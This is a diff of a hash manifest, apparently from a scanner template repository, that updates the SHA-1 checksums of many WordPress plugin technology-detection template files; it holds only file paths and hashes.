+http/technologies/wordpress/plugins/formidable.yaml:2155049fe26c2f1df46d8f5482e144eee8c55115 +http/technologies/wordpress/plugins/forminator.yaml:d117035d16f330cafc24669dfd6527b00b59437c +http/technologies/wordpress/plugins/ga-google-analytics.yaml:ac7e85228cde1d7f8fbb20e69ee1a37077fd3b72 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:e74ff547bc783cecfb1a373dd3f240ecb290cc7e +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:5c8e0bf74f28396b2b7ed346709aeeb5ea45f588 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:c31516f8823d6f9c465d467a0db6ed26d8c60039 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:c7abe56ffd75eb3452f36d8f262e3f5e1b18a5ec +http/technologies/wordpress/plugins/google-site-kit.yaml:2d3c5cd0b5717bdfb9a4ce57c3b69f64fe3f6cbd +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:649db235e8b57495696e8f2b91fe0ea3958d32f0 +http/technologies/wordpress/plugins/gtranslate.yaml:2bdaec24984f79286c5be0f8716aa2f697d0f675 +http/technologies/wordpress/plugins/gutenberg.yaml:f6d0430d915b49da13c43ada1ebbd2c6bd51715f +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:bfc1bcc22fdd46a52187b0bca8dfe71a5dc4c331 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:ae7725c709e61d024f949cb6d4ed72bb1f57d159 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:d21fa30f9b85d52b40ebeb80c8685b589c1aaae4 +http/technologies/wordpress/plugins/header-footer.yaml:fceb564cd3acaf6068a9d53bc5ec39d082195688 +http/technologies/wordpress/plugins/health-check.yaml:8d1d34fe40df19b4d0812e819c7fda3c0d301750 +http/technologies/wordpress/plugins/hello-dolly.yaml:d979f83f2ec41e4e37eb4213fc5bba823a930cad +http/technologies/wordpress/plugins/host-webfonts-local.yaml:92e27e2a3e106fa3cf2dbdaf183b63127e828401 +http/technologies/wordpress/plugins/hostinger.yaml:bf6b35b1dab2078e197c1de62522e60d421872f0 +http/technologies/wordpress/plugins/image-optimization.yaml:ea95c354bb8a06d389d775eeb4c288b480a3f186 +http/technologies/wordpress/plugins/imagify.yaml:0aacb82411427d05e080e6544e8ecaca0021aaa7 +http/technologies/wordpress/plugins/imsanity.yaml:5ffa531403c5ea8844c8d051816ba20aae0f02d4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:d67cd7fcd4835b9438ded7999c584493ae1be3ef +http/technologies/wordpress/plugins/instagram-feed.yaml:aade0abd8c1d14484f0a3a5d65ddefe0157ce7bc +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:181e88758226a725f5b49caa539ebd882aa9912e http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:ecd8d66bb8e3b434e055471003a34094d0cffe90 +http/technologies/wordpress/plugins/jetpack.yaml:adbb523ec16c28715016d940b7251bf628719432 +http/technologies/wordpress/plugins/kadence-blocks.yaml:532c3dc500c0a754042fe8daea83467f77097f16 +http/technologies/wordpress/plugins/kirki.yaml:f8f4ca733a7fabc2477b67fac83911a53626a88e +http/technologies/wordpress/plugins/leadin.yaml:fbdc56f55dfbdbccf9f7a439e57ce0715db456e3 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:00e060fd3ef77e85a78826de31c5d1ae70d80761 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:e9f7daf2104a9079a8bc958faea341417090414d +http/technologies/wordpress/plugins/litespeed-cache.yaml:3dd6e0c08cc22d9c5542b6780592557eebabf487 +http/technologies/wordpress/plugins/loco-translate.yaml:25d999fda0163b3f93455dc871f94eb7480cd7a2 +http/technologies/wordpress/plugins/loginizer.yaml:327e98a3fd7377ec8e145be40155ff885f6d6f41 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7cf476bbfb7208923bad6cb2b6af833f02ba5021 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d33d5440a80b8e19f3445e0a72a0ef93bde371f8 +http/technologies/wordpress/plugins/mailpoet.yaml:a3f63f522e6533bd4d69d596e3757861c3ab1d4f +http/technologies/wordpress/plugins/maintenance.yaml:0e461d23494356862b5cdfa84ac8dc2c4d41e698 +http/technologies/wordpress/plugins/mainwp-child.yaml:20fdbd3c9f6624a72ebb1c1967e2a2a1dbd2e944 +http/technologies/wordpress/plugins/malcare-security.yaml:928b6d9d224b556691c26b42a72e5ba738c7a418 +http/technologies/wordpress/plugins/megamenu.yaml:920d9f9444cac40bfb73c8fae9890e1f0ccd9924 +http/technologies/wordpress/plugins/members.yaml:f120a714faee1c98e5eb44a6f53a6ee69adc4a95 +http/technologies/wordpress/plugins/meta-box.yaml:f8a01c9bc2d9223b54f5271eb6b061dfd413ae3e +http/technologies/wordpress/plugins/metform.yaml:48176562d95f417c3d281fc635ae3ac33ff44204 +http/technologies/wordpress/plugins/ml-slider.yaml:b49521fd2f75457f36cd158be5c514e5a64e0c7a +http/technologies/wordpress/plugins/newsletter.yaml:fcbaceb14ab14b42c8148a6f05bfc7b8cfc3f4c9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:c6221e647431a6a34569cad688f145aedd89efdb +http/technologies/wordpress/plugins/nextgen-gallery.yaml:3f7b2e6ac0bf70574321eb6a5dd4e9f32ab2cb90 +http/technologies/wordpress/plugins/ninja-forms.yaml:9a632d1e1d460a988a32d5e8e39f8535824efccd +http/technologies/wordpress/plugins/ocean-extra.yaml:045a164d07b9da4535682471acbbcf3d7578ba74 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:edbcea86c89d2a758a056c574dbcf7203cfec7e5 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:33221419751fc7379b80f34f2b08bf82f8eb1c90 +http/technologies/wordpress/plugins/optinmonster.yaml:53ace1bd305f8f8ce3e9197a809517ab77154432 +http/technologies/wordpress/plugins/otter-blocks.yaml:f3e607ba41246682eca51de0d420c3fdff6585f2 +http/technologies/wordpress/plugins/password-protected.yaml:a6422fac25eaeb5e4b912de5b4d4247d21aeeb33 +http/technologies/wordpress/plugins/pdf-embedder.yaml:40ffe65e8efad2107f64a6969ebcdb8e1aa9c8f6 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:3cfa338d940ea525948796cd23f112abf02952b3 +http/technologies/wordpress/plugins/pixelyoursite.yaml:6d17774a72d213b7dd5304619e1a4a3ab73939e7 +http/technologies/wordpress/plugins/polylang.yaml:a9adf0a41a472cfd6d25b393f99e1132ee834194 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:a7c96c2aec53a40e63096de75cee7f47ef872023 +http/technologies/wordpress/plugins/post-smtp.yaml:067894da25cd2c9aead595bd0a306f70f46de3c8 +http/technologies/wordpress/plugins/post-types-order.yaml:3c37276100ed47081b7f18674378dae3b8d59097 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:16fc997f76b697b0da5369d740f2018481365086 +http/technologies/wordpress/plugins/pretty-link.yaml:f1fdc24aa04b6b949086bff0cc61ca263b940923 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:bc2cfb8c31ddb428585dc3ef68035284e621a608 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:d722365a7e3f105c38044e933c27e1049d2c7b6b +http/technologies/wordpress/plugins/redirection.yaml:3b3e5f04871b94b54d6e6401c22d6152639eca4f +http/technologies/wordpress/plugins/redux-framework.yaml:bd66377a76b74a60473fe9fe4dfe7fb63370c259 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:428ed8677f27847fa794d17461e65d77533a7a7a +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:9a626e63f39c582fc441ae2c4a70d178cd1e8fb8 +http/technologies/wordpress/plugins/safe-svg.yaml:4eedf55c45589ab3fd2b3f2fe4ac0b20c8624740 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:66064de4a4ecf18b09ff7f20f8ae3ac7d6034208 +http/technologies/wordpress/plugins/sg-cachepress.yaml:9e00453a3e9d289ce188bb59e43c216a2eadd5b0 +http/technologies/wordpress/plugins/sg-security.yaml:9719fbe8acab154010f20b8d7e907d4616f32182 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:308c42dfa11c7cc608617aef8cf412c2dde914f7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:1f62e2e77dfe54567c5df6dc3168b1bae05c76c1 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:a2198529a173c75f7c8542c7a86038bacd3ef675 +http/technologies/wordpress/plugins/simple-history.yaml:7c57691a0f5e6647403f23a25c9b2df1fdb61b04 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:b5fef0f366e303803c01b936add915f899aea831 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:5958a4fddf53a6e158f93c7adf7dce2efdeb020f +http/technologies/wordpress/plugins/smart-slider-3.yaml:c816ee91369e63dc009dd1d2a3a796674f392abe +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:a7110001ecb3db87cda6226123799c4a0718b84a http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9112e82604dbf562fb05644cce2915a0ea15e905 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:492c2253a301a7a8f79f4c32ab784e08122dda5a +http/technologies/wordpress/plugins/sucuri-scanner.yaml:857179c058a6fd03516a7553ff27eb026b9cee62 +http/technologies/wordpress/plugins/svg-support.yaml:fb56aa1a7041dfcfc803a6e57971d7d33327bef1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:361138178073f61fde4d3feed431331bb12ace69 +http/technologies/wordpress/plugins/tablepress.yaml:f9fabba7c3d65d7a1072a540da7b0df76731b535 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:32c858bc7535186aa3d5f27588f121adb736c7bc +http/technologies/wordpress/plugins/templately.yaml:4d96de54404d6f65335bf5e204ea2bc07b5b94cf +http/technologies/wordpress/plugins/the-events-calendar.yaml:97ef2c15401bc4916d93d335b3bb6cdce532234d http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:f520151fb8af6edd1e198aa76065e994442dbc5e +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:84b23cae261bb58dab2994fba7c2ddd7c350930f +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:690dc9855663c07d556a10681a2b7e75fbc2abd8 +http/technologies/wordpress/plugins/under-construction-page.yaml:67d72772817390ebc99d0c263b384ea080ac373e http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:c6e292ecd63ae10bf93e5979d35415d8ffd85545 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:a8dc24909ddf8491a8cf3bf3965ad309fdcf3897 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:5ab0b65082aef0b46be6831cee035abbd6254271 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:425676f7c8686310813444d22803ebddbe9eac1e +http/technologies/wordpress/plugins/webp-express.yaml:1c1df4bfe1eed6b92669b62239a595097c7c9f06 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:cf94ccf6f7ae9a9674deb0ef0df1d39a4955c264 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:d729189ac12d41d85767166a54b4f77d7f67864a +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:759a5a90599017ab14a6c7821b386fe7736fd5e4 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:6e03eb051cf136692d4a57886adcdbad3c7a8169 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:b19bd7b0c34ee7522b994c229ee27e5e07368303 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:eb108ffa255631dd481cf120eb67f74c0650841b +http/technologies/wordpress/plugins/woocommerce-payments.yaml:6fe485a1f7fa3919a0b404b2fabc56b5e7db93c2 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:5a715e0325aa2d72a87207fc713c02e11d66e315 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:0ccc50ed6c1c0f1a8dba9b6870547b9981bc398b +http/technologies/wordpress/plugins/woocommerce-services.yaml:59bd173c4f49d796cd24618b8031ed1c766e297d +http/technologies/wordpress/plugins/woocommerce.yaml:983775e0f00646285de9b7b0d00f9a12e94e8f31 +http/technologies/wordpress/plugins/wordfence.yaml:dbade4de76461aaab09659a41d2ca5ba62957b54 +http/technologies/wordpress/plugins/wordpress-importer.yaml:bd0db951991b3913038269dfa5ce2a96896a65e3 +http/technologies/wordpress/plugins/wordpress-seo.yaml:4d95ae858642b37927c52bc015818adcdaad22d2 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:2d332101ed7dd504e1c98b5febacd35f292704a8 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:100484cc79cbc52a27843b6400cc08f305242029 +http/technologies/wordpress/plugins/wp-file-manager.yaml:abe902c8cc771247685a62d3d62f528a13e8f140 +http/technologies/wordpress/plugins/wp-google-maps.yaml:ddb29311f43fc1737c4d2317a4e11bc8c2b2a95d +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:4a7d2de0a8da6dddc6c5b1dc4e128f3693fbe835 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:41652457399072aa48177e65195d3965edb39c91 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:34bba16838de32fe0a997635c1bbab991f8c40e3 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:4219b60cb3a0a94f18e156518195a04041e94274 +http/technologies/wordpress/plugins/wp-optimize.yaml:f2c4a1cff4f1856b45636fcd531f8828c229e3c6 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:9202a116162f7b53cde137e122112556786b2d8c +http/technologies/wordpress/plugins/wp-reset.yaml:9a4dbec902cd06dc5aa937a2ab7268b1085321a1 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:e24eb8d192298263cf526df58b7fca04d0ed4d31 +http/technologies/wordpress/plugins/wp-rollback.yaml:1727b3cd3106c06b092bb36fcfbebe9ba88092a6 +http/technologies/wordpress/plugins/wp-seopress.yaml:ebd84bcc71e617993b3ef8d5f26e48171a24a1fb +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:cad2da672c42cde5b953b2dfbf94bb22e23fc257 +http/technologies/wordpress/plugins/wp-smushit.yaml:d387f4958c03e4d3020e392f2c48e0c04403fb30 +http/technologies/wordpress/plugins/wp-statistics.yaml:edb6ace1f087b200410fcc8a724b1e874fab89cf +http/technologies/wordpress/plugins/wp-super-cache.yaml:ce68136fae12f929a9509829f25019f2b6ba8358 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 